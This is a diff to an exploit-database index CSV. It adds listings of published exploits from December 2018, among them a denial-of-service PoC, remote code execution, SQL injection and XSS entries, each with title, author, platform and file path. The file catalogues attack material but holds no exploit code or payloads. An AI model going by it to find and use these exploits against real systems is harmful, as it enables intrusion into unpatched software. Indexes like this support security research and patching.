+45934,exploits/linux/dos/45934.txt,"Budabot 4.0 - Denial of Service (PoC)",2018-12-03,"Ryan Delaney",dos,linux,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -16984,6 +16986,7 @@ id,file,description,date,author,type,platform,port
 45914,exploits/linux/remote/45914.rb,"PHP imap_open - Remote Code Execution (Metasploit)",2018-11-29,Metasploit,remote,linux,
 45917,exploits/multiple/remote/45917.rb,"TeamCity Agent - XML-RPC Command Execution (Metasploit)",2018-11-29,Metasploit,remote,multiple,
 45925,exploits/java/remote/45925.rb,"Apache Spark - Unauthenticated Command Execution (Metasploit)",2018-11-30,Metasploit,remote,java,6066
+45926,exploits/windows/remote/45926.py,"CyberArk 9.7 - Memory Disclosure",2018-12-03,"Thomas Zuk",remote,windows,1858
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -40426,3 +40429,10 @@ id,file,description,date,author,type,platform,port
 45904,exploits/hardware/webapps/45904.txt,"Zyxel VMG1312-B10D 5.13AAXA.8 - Directory Traversal",2018-11-26,"numan türle",webapps,hardware,80
 45918,exploits/hardware/webapps/45918.py,"Schneider Electric PLC - Session Calculation Authentication Bypass",2018-11-30,Photubias,webapps,hardware,80
 45920,exploits/cgi/webapps/45920.txt,"Synaccess netBooter NP-02x/NP-08x 6.8 - Authentication Bypass",2018-11-30,LiquidWorm,webapps,cgi,80
+45927,exploits/php/webapps/45927.py,"Fleetco Fleet Maintenance Management 1.2 - Remote Code Execution",2018-12-03,AkkuS,webapps,php,80
+45928,exploits/hardware/webapps/45928.txt,"Rockwell Automation Allen-Bradley PowerMonitor 1000 - Cross-Site Scripting",2018-12-03,Luca.Chiou,webapps,hardware,80
+45929,exploits/linux/webapps/45929.py,"PaloAlto Networks Expedition Migration Tool 1.0.106 - Information Disclosure",2018-12-03,ParagonSec,webapps,linux,80
+45930,exploits/php/webapps/45930.pl,"Joomla! Component JE Photo Gallery 1.1 - 'categoryid' SQL Injection",2018-12-03,"Ihsan Sencan",webapps,php,80
+45932,exploits/php/webapps/45932.txt,"PHP Server Monitor 3.3.1 - Cross-Site Request Forgery",2018-12-03,"Javier Olmedo",webapps,php,80
+45933,exploits/linux/webapps/45933.py,"Apache Superset 0.23 - Remote Code Execution",2018-12-03,"David May",webapps,linux,
+45935,exploits/php/webapps/45935.txt,"Wordpress Plugins Advanced-Custom-Fields 5.7.7 - Cross-Site Scripting",2018-12-03,"Loading Kura Kura",webapps,php,80